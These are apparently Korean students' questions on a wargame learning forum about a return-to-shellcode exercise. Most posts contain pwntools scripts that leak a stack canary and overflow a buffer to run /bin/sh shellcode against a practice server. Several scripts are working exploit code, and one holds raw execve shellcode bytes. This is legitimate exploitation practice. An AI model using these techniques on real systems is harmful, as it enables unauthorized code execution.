카나리를 잘라올 때 canary = u64(b"\x00"+p.recvline()[-9:-2]) 를 사용했는데, 로컬에서는 정상적으로 쉘이 떨어지는데 원격 서버에서 할 때는 동작하지 않고 Got EOF while reading in interactive 가 뜹니다. p.recvuntil(payload) canary = u64(b"\x00"+p.recvn(7)) 랑 동일하게 결과가 나오는 것 같은데 무슨 차이가 있어서 EOF가 뜨는건지 궁금합니다 !

강의에 있는대로 실습할려고 ./r2s.py[+] Starting local process './r2s': pid 8501[+] Address of buf: 0x7ffe1d28c570[+] buf <=> sfp: 0x60[+] buf <=> canary: 0x58 이렇개 코드를 만들어서 실행시켯는데 pid 갑이에러가나요 pid값은달라지는 값인가요? 값을어덯개 구하나요?ㅜㅜㅜ

from pwn import * p = remote('host3.dreamhack.games', 9669) context.arch = 'amd64' p.recvuntil('Address of the buf:') buf = int(p.recv(14),16) // (1) buf = p64(buf) shellcode = asm(shellcraft.sh()) payload = shellcode.ljust(89,b'\x90') // (2) p.sendafter('Input: ',payload) canary = b'\x00'+p.recv(7) payload = shellcode.ljust(88,b'\x90') // (3) payload += canary payload += b'A'*8 // (4) payload += buf p.sendline(payload) p.interactive() 제가 코드를 이해하지 못해서, 다른 블로그에 있는 코드를 참조하였습니다. (1)의 경우, 왜 14바이트만큼 16진수로 불러오는지 정확히 모르겠습니다. (2),(3)의 경우, 쉘 코드의 첫바이트가 \x00인 널바이트라고 저는 생각했는데, \x90 을 넣는 이유가 무엇인가요? 그리고 shellcode.ljust의 정확한 용도가 무엇인지 궁금합니다. (4)의 경우, 더미 부분인 8바이트를 채우기 위해서 A를 8번 집어넣는것인가요? 더 열심히 공부하겠습니다.

from pwn import asm,shellcraft,remote, context, u64, p64 p = remote('host3.dreamhack.games', 19436) context.arch = 'amd64' p.recvuntil(b'Address of the buf: ') buf = int(p.recvn(14), 16) print(buf) p.recvuntil(b'Distance between buf and $rbp: ') sfp = p.recvn(2) sfp = int(sfp) bf2canary = sfp-8 print('buf->canary: ', bf2canary) payload=b'A'*(bf2canary+1) p.sendlineafter(b'Input: ', payload) p.recvuntil(payload) canary = u64(b'\x00' + p.recvn(7)) # 0 바이트를 앞에 추가 shellcode = asm(shellcraft.sh()) payload = shellcode.ljust(bf2canary, b'A') + p64(canary) + b'B'*8 + p64(buf) p.recvuntil(b'[2] Overwrite the return address') p.sendlineafter(b'Input: ', payload) p.interactive() 코드에 무슨 문제가 있는지 모르겠습니다 ㅠㅠㅠ

payload = sh.ljust(buf2cnry, b"A") + p64(cnry) + b"B"*0x8 + p64(buf) 로 쉘 값을 buf에 넣고 다시 ret을 buf로 할 때 sh.ljust(buf2cnry, b"A") 에서 필요 없는 A는 어떻게 처리하기에 쉘 접근이 가능한지 궁금합니다.

해당 코드에서 사용되는 buf는 0x50사이즈인 반면, buf와 canary의 byte차이는 0x58입니다. 추가적인 8byte는 어디서 온 건가요? 단순한 Byte padding인가요? canary값을 받는 것에 대한 질문이 있습니다. 버퍼의 주소의 경우 다음과 같은 코드로 입력값을 받아왔습니다. buf = int(p.recvline()[0:-1], 16) slog('Address of buf', buf) 그리고 canary값은 다음과 같은 코드로 입력값을 받고 있습니다. raw_canary = p.recvn(7) print ("RAW_CANARY : ", raw_canary) cnry = u64(b'\x00' + raw_data) slog("canary : ", cnry) 해당 코드로 받은 데이터는 다음과 같습니다. raw_canary = 0x 41 0e ce 75 fe 86 81 (little endian) cnry = 0x 81 86 fe 75 ce 0e 41 00 (big endian) 여기서 궁금한게, buf는 단순히 받으면 본래 buf의 주소값이 받아져서, 별다른 데이터 핸들링이 필요가 없이 big endian으로 잘 받아지는데, canary의 경우 little endian 데이터로 받아지고 이를 u64를 써서 big endian unpacking해줘야 하는 이유를 잘 모르겠습니다. 이 지점에서 많이 헷갈리고 있는데, 도움 부탁드립니다.

그 pwntools 에서 어쩔때는 sendafter 쓰면 되는데 어쩔때는 꼭 sendlineafter 을 써야 되더라고요.. read 나 get 함수가 쓰일때는 lineafter 가 쓰이는 머 그런건가요?? 너무 헷갈려요....ㅠㅠㅠㅠ

from pwn import * def slog(n, m): return success(": ".join([n, hex(m)])) p = remote("host3.dreamhack.games",20931) p.recvuntil(b'buf: ') buf = int(p.recvline(),16) slog("BUF ADD is ",buf) p.recvuntil(b'$rbp: ') buf2sfp = int(p.recvline()) buf2cnry = buf2sfp-8 slog("buf2sfp",buf2sfp) slog("buf2cnry",buf2cnry) payload = b'A'*(buf2cnry+1) p.sendafter(b'Input:',payload) p.recvuntil(payload) cnry = u64(b'\x00'+p.recvn(7)) slog("cnry is ",cnry) sh = asm(shellcraft.sh()) payload = sh.ljust(buf2cnry,b'A')+p64(cnry)+b'B'*0x8 +p64(buf) p.sendlineafter(b'Input: ',payload) p.interactive() 해당 코드가 쉘이 따지지 않네요.. 아무리 확인해봐도 쉘이 죽는데 어떤 부분이 잘못된건가요..?

from pwn import* p=remote('host1.dreamhack.games', 23077) context.arch = "amd64" #shellcode shellcode = asm(shellcraft.amd64.linux.sh()) #[0] Starting_Buf p.recvuntil("Address of the buf: ") buf_add = int(p.recv(14),16) print("Starting Buf address : ", hex(buf_add)) #[1] Canary_leak payload = b'A'*88 payload += b'B' p.sendlineafter('Input: ',payload) p.recvuntil(payload) leak_canary=p.recv(7) canary = u64(b'\x00'+leak_canary) print("Canary : ",hex(canary)) #[2] Payload #payload2 = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80' payload = shellcode payload += b'A'*(88-len(shellcode)) payload += p64(canary) payload += b'B'*8 payload += p64(buf_add) p.sendlineafter("Input: ",payload) p.interactive()

from pwn import * 다했습니다